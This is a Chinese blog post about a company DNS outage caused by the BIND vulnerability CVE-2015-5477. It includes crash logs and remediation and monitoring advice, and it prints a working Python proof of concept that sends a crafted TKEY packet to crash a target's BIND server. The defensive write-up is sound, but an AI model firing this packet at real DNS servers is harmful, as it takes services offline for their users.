公司DNS被攻击及解决办法

DNS服务器被攻击 今天给大家说说我们的DNS服务器被攻击及解决办法。

问题现象

今天上午10:30左右,公司的DNS服务器被攻击,导致平台部分服务不能访问。这时最先报警的是Zabbix,报出大量的主机宕机了。接到Zabbix报警后,赶紧登陆一台被监控节点,发现Zabbix agent进程是存在的,但是不能ping通Zabbix server节点,说明DNS出现了问题。

登陆DNS服务器,发现bind进程已经不存在了。赶紧查看日志,发现有如下的错误:

03-Jan-2017 10:28:22.208 general: critical: message.c:2335: REQUIRE(*name == ((void *)0)) failed, back trace
03-Jan-2017 10:28:22.208 general: critical: #0 0x417a3b in assertion_failed()+0x4b
03-Jan-2017 10:28:22.208 general: critical: #1 0x5d04ba in isc_assertion_failed()+0xa
03-Jan-2017 10:28:22.208 general: critical: #2 0x4afd13 in dns_message_findname()+0x143
03-Jan-2017 10:28:22.208 general: critical: #3 0x557d84 in dns_tkey_processquery()+0x184
03-Jan-2017 10:28:22.208 general: critical: #4 0x42ea10 in ns_query_start()+0x3c0
03-Jan-2017 10:28:22.208 general: critical: #5 0x40d44a in client_request()+0xa3a
03-Jan-2017 10:28:22.208 general: critical: #6 0x5f2dcb in run()+0x2ab
03-Jan-2017 10:28:22.208 general: critical: #7 0x348d2079d1 in _fini()+0x348cbfb139
03-Jan-2017 10:28:22.208 general: critical: #8 0x348cae886d in _fini()+0x348c4dbfd5
03-Jan-2017 10:28:22.208 general: critical: exiting (due to assertion failure)

这个就是2015年7月份爆出的CVE-2015-5477漏洞(拒绝服务漏洞),受影响的bind版本为9.x系列。由于TKEY查询的错误可导致BIND服务器发生REQUIRE断言失败并停止服务,攻击者利用漏洞可恶意构造数据包,导致TKEY记录查询错误,进而导致BIND服务器发生REQUIRE断言失败并停止服务。

解决办法

升级新版本的bind,然后进行测试,验证是否还存在此漏洞。测试脚本为:

#!/usr/bin/env python
import socket
import sys

print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 
03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')

上面的脚本具有一定的攻击性,请大家不要随便使用。不过可以针对自己家公司的DNS服务器进行内测,如果发现有问题,则赶紧升级DNS软件。

如何做到bind进程的高可用行:

  • 操作系统需要被监控(系统不监控会被打死的),监控系统是否宕机
  • 进程需要做到高可用(使用supervisor来管理进程),named进程异常退出可以自动启动
  • 监控named进程,进程不存在则报警

事后总结

上班第一天就遇到此问题,犹如当头一棒,让我清醒了很多。还是没有做到位,这台机器没有做任何监控。这次遇到这个问题,没有第一时间抓紧恢复,而是解决Zabbix问题。

针对上述发生的问题,汲取了如下几点经验教训:

  • 遇到故障问题,抓紧时间恢复是第一要务
  • 复盘故障问题,找出根本原因
  • 找出解决故障或问题的办法或如何避免类似的故障

原文发布于微信公众号 - 小白的技术客栈(XBDJSKZ)

原文发表时间:2017-09-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏喔家ArchiSelf

老码眼中的Git

Git 是 Linus Torvalds 为了帮助管理 Linux 内核开发而开发的一个开放源码的版本控制软件。大神就是大神,在开发了Linux之后,Git 是...

672
来自专栏PHP技术

Web安全实战

前言 本章将主要介绍使用Node.js开发web应用可能面临的安全问题,读者通过阅读本章可以了解web安全的基本概念,并且通过各种防御措施抵御一些常规的恶意攻击...

28910
来自专栏逸鹏说道

变种XSS:持久控制

0x00 引言 首先声明,这不是一个新洞,看过 Homakov 文章(最后附)以及译文的人想必对这种漏洞有所了解。 但原文写的太过简单(没有说明利用条件、情景和...

3336
来自专栏不会写文章的程序员不是好厨师

记一次"诡异"的git merge错误

今天照常开发,在日常部署测试的时候进行git merge 竟然出现了"代码丢失"的情况,相当诡异,特此记录。

723
来自专栏漏斗社区

工具|nessus自定义扫描策略

我们是谁? nessus工具! 我们要做什么? 扫描漏洞! 什么时候扫? 天天扫! 序言 有些时候我们并不希望进行全面的扫描和检测,仅需要针对某些漏洞进行安全...

4196
来自专栏史上最简单的Spring Cloud教程

JSON Web Tokens介绍

什么是JWT 这篇文章选择性翻译于https://jwt.io/introduction/ JWT简介 JSON Web Token(JWT)是一种开放标准(...

1818
来自专栏FreeBuf

暗云Ⅲ BootKit 木马分析

概况 “暗云”系列木马自2015年初被腾讯反病毒实验室首次捕获并查杀,至今已有2年多。在这两年多时间里,该木马不断更新迭代,持续对抗升级。 从今年4月开始,该木...

2947
来自专栏Java架构

谈谈微信支付曝出的漏洞

昨天(2018-07-04)微信支付的SDK曝出重大漏洞(XXE漏洞),通过该漏洞,攻击者可以获取服务器中目录结构、文件内容,如代码、各种私钥等。获取这些信息以...

1086
来自专栏向治洪

mqtt推送介绍

方案1、使用GCM服务(Google Cloud Messaging) 简介:Google推出的云消息服务,即第二代的C2DM。 优点:Google提供的服务、...

2088
来自专栏Java技术栈

JSON Web Token (JWT),服务端信息传输安全解决方案。

JWT介绍 JSON Web Token(JWT)是一种开放标准(RFC 7519),它定义了一种紧凑独立的基于JSON对象在各方之间安全地传输信息的方式。这些...

35210

扫描关注云+社区